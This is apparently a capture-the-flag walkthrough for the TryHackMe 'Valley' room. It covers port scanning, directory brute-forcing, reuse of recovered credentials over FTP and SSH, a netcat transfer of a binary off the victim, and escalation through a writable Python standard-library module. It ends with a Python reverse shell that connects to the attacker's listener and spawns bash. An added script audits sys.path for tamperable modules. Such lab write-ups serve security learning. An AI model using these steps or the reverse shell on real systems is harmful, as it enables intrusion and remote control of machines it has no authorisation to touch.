Valley
Room Link: https://tryhackme.com/room/valleype
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
FTP found on port 37370
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt


Kali
gobuster dir --url http://$VICTIM/static -w /usr/share/dirb/wordlists/big.txt -l

Kali
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt




Username: siemDev
Password: california

TCP/37370 - FTP
Kali
ftp $VICTIM 37370
Username: siemDev
Password: california

TCP/22 - SSH
Kali
ssh valleyDev@$VICTIM
Password: ph0t0s1234

Lateral Movement
Netcat
Kali (receiving)
nc -l -p 1234 > valleyAuthenticator
Victim (sending)
nc -w 3 $KALI 1234 < valleyAuthenticator
Kali
strings valleyAuthenticator > out.txt


Victim
Username: valley
Password: liberty123

Victim
cat /photos/script/photosEncrypt.py

Victim
locate base64
ls -lah /usr/lib/python3.8/base64.py
groups
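
The `ls -lah` on base64.py and the `groups` check above test whether a module that photosEncrypt.py imports can be modified by the current user. The audit script below is an added example, not from the original write-up: it walks every directory on sys.path and reports .py files that a non-root user could rewrite, which is the check an administrator would run to catch this before a root-run job imports such a module. SAMPLE_RECORDS holds constructed values, not output from the room.

```python
import os
import stat
import sys
from typing import Iterable, Iterator, List, Tuple

# Constructed sample records (path, st_mode, st_uid) shaped like what
# collect_py_files() yields; the first mirrors the base64.py check above.
SAMPLE_RECORDS = [
    ("/usr/lib/python3.8/base64.py", 0o100664, 0),
    ("/usr/lib/python3.8/os.py", 0o100644, 0),
    ("/home/dev/venv/lib/python3.8/site.py", 0o100644, 1000),
]


def collect_py_files(paths: Iterable[str]) -> Iterator[Tuple[str, int, int]]:
    """Walk each directory on the import path and yield every regular .py file."""
    for base in paths:
        if not os.path.isdir(base):
            continue  # sys.path also holds '' and zip archives; skip those
        for root, _dirs, files in os.walk(base):
            for name in files:
                if not name.endswith(".py"):
                    continue
                full = os.path.join(root, name)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    yield full, st.st_mode, st.st_uid


def weak_permissions(mode: int, uid: int) -> List[str]:
    """Reasons a file with this mode/owner can be rewritten by someone other than root."""
    reasons = []
    if mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if uid != 0:  # a user-owned venv on a root job's path is just as risky
        reasons.append(f"owned by uid {uid}, not root")
    return reasons


def audit(records: Iterable[Tuple[str, int, int]]) -> List[Tuple[str, List[str]]]:
    """Return (path, reasons) for every module a non-root user could tamper with."""
    return [(p, r) for p, m, u in records if (r := weak_permissions(m, u))]


if __name__ == "__main__":
    for path, reasons in audit(collect_py_files(sys.path)):
        print(f"{path}: {', '.join(reasons)}")
```

Run it as root on the host so that every directory a root cron job would import from is readable; any hit on a standard-library path should be fixed with chown root and chmod 644.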

Python Reverse Shell
from os import dup2
from subprocess import run
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("$KALI", 1337))  # $KALI is the placeholder for the listener address used throughout this page
dup2(s.fileno(), 0)  # stdin
dup2(s.fileno(), 1)  # stdout
dup2(s.fileno(), 2)  # stderr
run(["/bin/bash", "-i"])
Kali
nc -lvnp 1337
